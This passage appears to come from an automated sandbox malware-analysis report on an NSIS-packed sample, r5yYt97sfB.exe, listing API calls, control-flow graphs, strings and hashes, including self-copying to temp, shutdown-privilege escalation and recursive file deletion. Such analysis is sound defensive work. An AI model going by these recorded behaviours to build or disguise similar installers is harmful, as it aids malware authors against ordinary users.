                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403625
                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 0040362D
                                                                                                                                              • DeleteFileW.KERNELBASE(1033), ref: 00403641
                                                                                                                                                • Part of subcall function 00406183: lstrcpynW.KERNEL32(0040A230,0040A230,00000400,00403466,00429260,NSIS Error), ref: 00406190
                                                                                                                                              • OleUninitialize.OLE32(?), ref: 0040370C
                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040372E
                                                                                                                                              • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\r5yYt97sfB.exe",00000000,?), ref: 00403741
                                                                                                                                              • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,0040A328,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\r5yYt97sfB.exe",00000000,?), ref: 00403750
                                                                                                                                              • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\r5yYt97sfB.exe",00000000,?), ref: 0040375B
                                                                                                                                              • lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\r5yYt97sfB.exe",00000000,?), ref: 00403767
                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\), ref: 00403783
                                                                                                                                              • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 004037DD
                                                                                                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\r5yYt97sfB.exe,00420F08,00000001), ref: 004037F1
                                                                                                                                              • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 0040381E
                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 0040384D
                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403854
                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403869
                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 0040388C
                                                                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 004038B1
                                                                                                                                              • ExitProcess.KERNEL32 ref: 004038D4
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                                                              • String ID: "C:\Users\user\Desktop\r5yYt97sfB.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Local\magmaet\clenched$C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto$C:\Users\user\Desktop$C:\Users\user\Desktop\r5yYt97sfB.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                                                              • API String ID: 3586999533-3160581977
                                                                                                                                              • Opcode ID: f3ecbdcc9d2ddf88f0db60c94208847800fabd89ade3af92fca17dc4b9b4c2fd
                                                                                                                                              • Instruction ID: 382b60f40ca78a79eaa77c6fd6579f97e3273799caf5780a05f3f86dc88dff68
                                                                                                                                              • Opcode Fuzzy Hash: f3ecbdcc9d2ddf88f0db60c94208847800fabd89ade3af92fca17dc4b9b4c2fd
                                                                                                                                              • Instruction Fuzzy Hash: 1DD11771200300BBD7207F659D09A2B3EADEB4070AF15843FF885B62D2DB7D9956876E

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 135 405421-40543c 136 405442-405509 GetDlgItem * 3 call 40427c call 404b7f GetClientRect GetSystemMetrics SendMessageW * 2 135->136 137 4055cb-4055d2 135->137 158 405527-40552a 136->158 159 40550b-405525 SendMessageW * 2 136->159 139 4055d4-4055f6 GetDlgItem CreateThread CloseHandle 137->139 140 4055fc-405609 137->140 139->140 142 405627-405631 140->142 143 40560b-405611 140->143 147 405633-405639 142->147 148 405687-40568b 142->148 145 405613-405622 ShowWindow * 2 call 40427c 143->145 146 40564c-405655 call 4042ae 143->146 145->142 155 40565a-40565e 146->155 153 405661-405671 ShowWindow 147->153 154 40563b-405647 call 404220 147->154 148->146 151 40568d-405693 148->151 151->146 160 405695-4056a8 SendMessageW 151->160 156 405681-405682 call 404220 153->156 157 405673-40567c call 4052e2 153->157 154->146 156->148 157->156 164 40553a-405551 call 404247 158->164 165 40552c-405538 SendMessageW 158->165 159->158 166 4057aa-4057ac 160->166 167 4056ae-4056d9 CreatePopupMenu call 4061a5 AppendMenuW 160->167 174 405553-405567 ShowWindow 164->174 175 405587-4055a8 GetDlgItem SendMessageW 164->175 165->164 166->155 172 4056db-4056eb GetWindowRect 167->172 173 4056ee-405703 TrackPopupMenu 167->173 172->173 173->166 176 405709-405720 173->176 177 405576 174->177 178 405569-405574 ShowWindow 174->178 175->166 179 4055ae-4055c6 SendMessageW * 2 175->179 180 405725-405740 SendMessageW 176->180 181 40557c-405582 call 40427c 177->181 178->181 179->166 180->180 182 405742-405765 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 180->182 181->175 184 405767-40578e SendMessageW 182->184 184->184 185 405790-4057a4 GlobalUnlock SetClipboardData CloseClipboard 184->185 185->166
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 0040547F
                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040548E
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 004054CB
                                                                                                                                              • GetSystemMetrics.USER32(00000002), ref: 004054D2
                                                                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054F3
                                                                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405504
                                                                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405517
                                                                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405525
                                                                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405538
                                                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040555A
                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 0040556E
                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040558F
                                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040559F
                                                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055B8
                                                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055C4
                                                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 0040549D
                                                                                                                                                • Part of subcall function 0040427C: SendMessageW.USER32(00000028,?,00000001,004040A8), ref: 0040428A
                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004055E1
                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_000053B5,00000000), ref: 004055EF
                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 004055F6
                                                                                                                                              • ShowWindow.USER32(00000000), ref: 0040561A
                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 0040561F
                                                                                                                                              • ShowWindow.USER32(00000008), ref: 00405669
                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040569D
                                                                                                                                              • CreatePopupMenu.USER32 ref: 004056AE
                                                                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056C2
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004056E2
                                                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056FB
                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405733
                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 00405743
                                                                                                                                              • EmptyClipboard.USER32 ref: 00405749
                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405755
                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0040575F
                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405793
                                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 0040579E
                                                                                                                                              • CloseClipboard.USER32 ref: 004057A4
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                              • String ID: H7B${
                                                                                                                                              • API String ID: 590372296-2256286769
                                                                                                                                              • Opcode ID: 64a521bccca9f5caed772c9a5003e4b30c68140e3a7fe85c050ebaedb87b4aa9
                                                                                                                                              • Instruction ID: 2c7cb92300b087b9ae130e103e133312d6144c84674811722de124f1f1f34f09
                                                                                                                                              • Opcode Fuzzy Hash: 64a521bccca9f5caed772c9a5003e4b30c68140e3a7fe85c050ebaedb87b4aa9
                                                                                                                                              • Instruction Fuzzy Hash: 16B13770900608FFDF119F60DD899AE7B79FB08354F40847AFA45A62A0CB758E52DF68

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 434 4061a5-4061b0 435 4061b2-4061c1 434->435 436 4061c3-4061d9 434->436 435->436 437 4063f1-4063f7 436->437 438 4061df-4061ec 436->438 439 4063fd-406408 437->439 440 4061fe-40620b 437->440 438->437 441 4061f2-4061f9 438->441 442 406413-406414 439->442 443 40640a-40640e call 406183 439->443 440->439 444 406211-40621d 440->444 441->437 443->442 446 406223-40625f 444->446 447 4063de 444->447 448 406265-406270 GetVersion 446->448 449 40637f-406383 446->449 450 4063e0-4063ea 447->450 451 4063ec-4063ef 447->451 452 406272-406276 448->452 453 40628a 448->453 454 406385-406389 449->454 455 4063b8-4063bc 449->455 450->437 451->437 452->453 456 406278-40627c 452->456 459 406291-406298 453->459 457 406399-4063a6 call 406183 454->457 458 40638b-406397 call 4060ca 454->458 460 4063cb-4063dc lstrlenW 455->460 461 4063be-4063c6 call 4061a5 455->461 456->453 462 40627e-406282 456->462 472 4063ab-4063b4 457->472 458->472 464 40629a-40629c 459->464 465 40629d-40629f 459->465 460->437 461->460 462->453 468 406284-406288 462->468 464->465 470 4062a1-4062be call 406050 465->470 471 4062db-4062de 465->471 468->459 480 4062c3-4062c7 470->480 475 4062e0-4062ec GetSystemDirectoryW 471->475 476 4062ee-4062f1 471->476 472->460 474 4063b6 472->474 481 406377-40637d call 406417 474->481 477 406360-406364 475->477 478 4062f3-406301 GetWindowsDirectoryW 476->478 479 40635c-40635e 476->479 477->481 483 406366-40636a 477->483 478->479 479->477 482 406303-40630d 479->482 480->483 484 4062cd-4062d6 call 4061a5 480->484 481->460 487 406327-40633d SHGetSpecialFolderLocation 482->487 488 40630f-406312 482->488 483->481 490 40636c-406372 lstrcatW 483->490 484->477 492 406358 487->492 493 40633f-406356 SHGetPathFromIDListW CoTaskMemFree 487->493 488->487 491 406314-40631b 488->491 490->481 495 406323-406325 491->495 492->479 493->477 493->492 495->477 495->487
                                                                                                                                              APIs
                                                                                                                                              • GetVersion.KERNEL32(00000000,Completed,?,00405319,Completed,00000000,00000000,00000000), ref: 00406268
                                                                                                                                              • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004062E6
                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 004062F9
                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406335
                                                                                                                                              • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00406343
                                                                                                                                              • CoTaskMemFree.OLE32(?), ref: 0040634E
                                                                                                                                              • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406372
                                                                                                                                              • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,00405319,Completed,00000000,00000000,00000000), ref: 004063CC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                              • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                              • API String ID: 900638850-905382516
                                                                                                                                              • Opcode ID: bef7a9cb1f259f829c94a4570d8a9b9bb83f0db893824e0baf2e821e2216e9af
                                                                                                                                              • Instruction ID: 0f73e779dd6c4db66e797802c36dad016b528f10de9f6072c808280cb7245e7c
                                                                                                                                              • Opcode Fuzzy Hash: bef7a9cb1f259f829c94a4570d8a9b9bb83f0db893824e0baf2e821e2216e9af
                                                                                                                                              • Instruction Fuzzy Hash: 9361F271A00105EBDB209F25CD41AAE37A5AF50314F16807FFD46BA2D0D73D89A2CB9D

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 496 405974-40599a call 405c3f 499 4059b3-4059ba 496->499 500 40599c-4059ae DeleteFileW 496->500 502 4059bc-4059be 499->502 503 4059cd-4059dd call 406183 499->503 501 405b30-405b34 500->501 505 4059c4-4059c7 502->505 506 405ade-405ae3 502->506 509 4059ec-4059ed call 405b83 503->509 510 4059df-4059ea lstrcatW 503->510 505->503 505->506 506->501 508 405ae5-405ae8 506->508 511 405af2-405afa call 4064c6 508->511 512 405aea-405af0 508->512 513 4059f2-4059f6 509->513 510->513 511->501 520 405afc-405b10 call 405b37 call 40592c 511->520 512->501 516 405a02-405a08 lstrcatW 513->516 517 4059f8-405a00 513->517 519 405a0d-405a29 lstrlenW FindFirstFileW 516->519 517->516 517->519 521 405ad3-405ad7 519->521 522 405a2f-405a37 519->522 536 405b12-405b15 520->536 537 405b28-405b2b call 4052e2 520->537 521->506 524 405ad9 521->524 525 405a57-405a6b call 406183 522->525 526 405a39-405a41 522->526 524->506 538 405a82-405a8d call 40592c 525->538 539 405a6d-405a75 525->539 528 405a43-405a4b 526->528 529 405ab6-405ac6 FindNextFileW 526->529 528->525 534 405a4d-405a55 528->534 529->522 533 405acc-405acd FindClose 529->533 533->521 534->525 534->529 536->512 540 405b17-405b26 call 4052e2 call 406024 536->540 537->501 549 405aae-405ab1 call 4052e2 538->549 550 405a8f-405a92 538->550 539->529 541 405a77-405a80 call 405974 539->541 540->501 541->529 549->529 553 405a94-405aa4 call 4052e2 call 406024 550->553 554 405aa6-405aac 550->554 553->529 554->529
                                                                                                                                              APIs
                                                                                                                                              • DeleteFileW.KERNELBASE(?,?,771B3420,771B2EE0,"C:\Users\user\Desktop\r5yYt97sfB.exe"), ref: 0040599D
                                                                                                                                              • lstrcatW.KERNEL32(00425750,\*.*,00425750,?,?,771B3420,771B2EE0,"C:\Users\user\Desktop\r5yYt97sfB.exe"), ref: 004059E5
                                                                                                                                              • lstrcatW.KERNEL32(?,0040A014,?,00425750,?,?,771B3420,771B2EE0,"C:\Users\user\Desktop\r5yYt97sfB.exe"), ref: 00405A08
                                                                                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,771B3420,771B2EE0,"C:\Users\user\Desktop\r5yYt97sfB.exe"), ref: 00405A0E
                                                                                                                                              • FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,771B3420,771B2EE0,"C:\Users\user\Desktop\r5yYt97sfB.exe"), ref: 00405A1E
                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,Error writing temporary file. Make sure your temp folder is valid.,0000002E), ref: 00405ABE
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405ACD
                                                                                                                                              Strings
                                                                                                                                              • "C:\Users\user\Desktop\r5yYt97sfB.exe", xrefs: 0040597D
                                                                                                                                              • \*.*, xrefs: 004059DF
                                                                                                                                              • PWB, xrefs: 004059CD
                                                                                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405A5E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                              • String ID: "C:\Users\user\Desktop\r5yYt97sfB.exe"$Error writing temporary file. Make sure your temp folder is valid.$PWB$\*.*
                                                                                                                                              • API String ID: 2035342205-2467641603
                                                                                                                                              • Opcode ID: 03fd1591811734580f28d43f6b2dd8bf165791cda161b7166c14a59216ccda8d
                                                                                                                                              • Instruction ID: d49c34b76256c1d29f4337415f4183e275b3e80d30968624801757685f99445f
                                                                                                                                              • Opcode Fuzzy Hash: 03fd1591811734580f28d43f6b2dd8bf165791cda161b7166c14a59216ccda8d
                                                                                                                                              • Instruction Fuzzy Hash: E041B130A00A14EADB21AB618D89BAF7778DF41764F20427FF805B51D2D77C5982CE6E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 673f315f3887413ad686258b59d5e48c26cbda3fe4b4ae472fabdc6907277f98
                                                                                                                                              • Instruction ID: 5555e847f210990d4306c473702a26b4278c0affe79ec1256b97cb42bd71170f
                                                                                                                                              • Opcode Fuzzy Hash: 673f315f3887413ad686258b59d5e48c26cbda3fe4b4ae472fabdc6907277f98
                                                                                                                                              • Instruction Fuzzy Hash: 60F17671D04229CBCF28CFA8C8946ADBBB0FF44305F25856ED856BB281D7785A86CF45
                                                                                                                                              APIs
                                                                                                                                              • CoCreateInstance.OLE32(0040849C,?,00000001,0040848C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                                                                                              Strings
                                                                                                                                              • C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto, xrefs: 00402154
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateInstance
                                                                                                                                              • String ID: C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto
                                                                                                                                              • API String ID: 542301482-576767988
